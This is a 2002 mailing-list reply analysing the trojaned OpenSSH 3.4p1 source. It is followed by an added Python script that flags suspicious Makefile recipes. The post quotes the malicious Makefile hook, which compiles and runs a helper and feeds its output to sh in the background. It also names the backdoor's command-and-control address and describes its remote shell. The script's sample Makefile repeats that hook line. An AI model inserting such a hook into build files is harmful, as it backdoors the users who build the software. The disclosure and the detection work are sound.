Re: [fw-wiz] OpenSSH 3.4p1 possibly trojaned
From: hennings@skiinfo.com
Date: 08/01/02
- Next message: Christopher Hicks: "Re: [fw-wiz] Is the order of the rules entered in iptables important?"
- Previous message: rob.roberson@verizon.com: "[fw-wiz] (no subject)"
- Maybe in reply to: Paul D. Robertson: "[fw-wiz] OpenSSH 3.4p1 possibly trojaned"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: hennings@skiinfo.com
To: "Paul D. Robertson" <proberts@patriot.net>
Date: Thu Aug 1 10:01:00 2002
| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.
(...)
| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
|
| Trojan connection:
|
| 203.62.158.32:6667 (web.snsonline.net)
More details:
The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to a shell script in the current directory
and then run from the Makefile.
The generated script contains some C code, which is compiled and then
run.
It's forking, connecting to 203.62.158.32:6667, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)
Regards
Henning Spjelkavik
--
Skiinfo AS
Christian Krohgsgate 60
0186 Oslo
Fax: 22114011
Foretaksnr: 976036859
http://www.webinfo.no/
E-mail: info@webinfo.no
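The hook Henning describes lives in the Makefile, so a reviewer can catch it before `make` ever runs the generated script. The following audit script is an added example, not code from this thread or from the OpenSSH project; it walks a Makefile's recipe lines and flags the combination quoted above (compile a helper from source, run it, hand its output to `sh`, background it, hide the line with `@`). The embedded Makefile is constructed for the example and only mirrors the shape of the quoted hook; the heuristics and names (`audit_makefile`, `Finding`) are this example's own.

```python
"""Flag build-time execution hooks in a Makefile before running make.

Added example (not from the firewall-wizards post or the OpenSSH project).
It looks for recipe lines that compile a helper, execute it, feed the
result to a shell and background it -- the pattern quoted in the post.
"""
import re
from dataclasses import dataclass

# Individual signals; a recipe is reported when any of them fires.
COMPILE_RE = re.compile(r"\$\(CC\)|\bcc\b|\bgcc\b")            # invokes a C compiler
RUN_LOCAL_RE = re.compile(r"(?:^|[;&|\s])\./\S+")             # runs something from the build tree
SHELL_FEED_RE = re.compile(r"\b(?:sh|bash)\s+(?:-c\s+)?\./\S+|\|\s*(?:sh|bash)\b")
BACKGROUND_RE = re.compile(r"&\s*$")                           # leaves a process running after make
SILENT_RE = re.compile(r"^\s*@")                               # '@' stops make from echoing the line


@dataclass
class Finding:
    target: str
    lineno: int
    recipe: str
    reasons: tuple


def parse_recipes(makefile_text):
    """Yield (target, lineno, recipe) for each recipe line, joining '\\' continuations."""
    target = None
    lines = makefile_text.splitlines()
    i = 0
    while i < len(lines):
        raw = lines[i]
        start = i + 1
        while raw.rstrip().endswith("\\") and i + 1 < len(lines):
            i += 1
            raw = raw.rstrip()[:-1] + " " + lines[i].lstrip()
        i += 1
        if raw.startswith("\t"):
            # Tab-indented lines are recipe commands for the current target.
            if target is not None:
                yield target, start, raw.strip()
        elif re.match(r"^[^\s#:=]+\s*:", raw) and "=" not in raw.split(":")[0]:
            target = raw.split(":")[0].strip()
        # Variable assignments, comments and blank lines carry no recipe.


def audit_recipe(recipe):
    """Return the reasons a single recipe line deserves a human look (empty if none)."""
    reasons = []
    if COMPILE_RE.search(recipe) and RUN_LOCAL_RE.search(recipe):
        reasons.append("compiles a helper and runs it in the same recipe")
    if SHELL_FEED_RE.search(recipe):
        reasons.append("feeds generated content to a shell")
    if BACKGROUND_RE.search(recipe):
        reasons.append("backgrounds a process during the build")
    if reasons and SILENT_RE.match(recipe):
        reasons.append("silenced with @ so make does not echo it")
    return tuple(reasons)


def audit_makefile(text):
    """Run audit_recipe over every recipe line and collect the findings."""
    findings = []
    for target, lineno, recipe in parse_recipes(text):
        reasons = audit_recipe(recipe)
        if reasons:
            findings.append(Finding(target, lineno, recipe, reasons))
    return findings


# Constructed sample: an ordinary Makefile with one recipe shaped like the
# hook quoted in the post (helper name and paths are illustrative only).
SAMPLE_MAKEFILE = """\
CC=gcc
CFLAGS=-O2

all: libopenbsd-compat.a
\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

libopenbsd-compat.a: $(OBJS)
\t$(AR) rv $@ $(OBJS)
\t$(RANLIB) $@

clean:
\trm -f *.o *.a
"""

if __name__ == "__main__":
    for f in audit_makefile(SAMPLE_MAKEFILE):
        print(f"line {f.lineno} (target '{f.target}'): {f.recipe}")
        for r in f.reasons:
            print(f"    - {r}")
```

On the sample only the `all` recipe is reported, with all four reasons; the archive and clean recipes pass. Treat the output as a triage list rather than a verdict: a legitimate code generator that compiles and runs a helper will also be flagged, and the point is that a reviewer reads such lines before building rather than after.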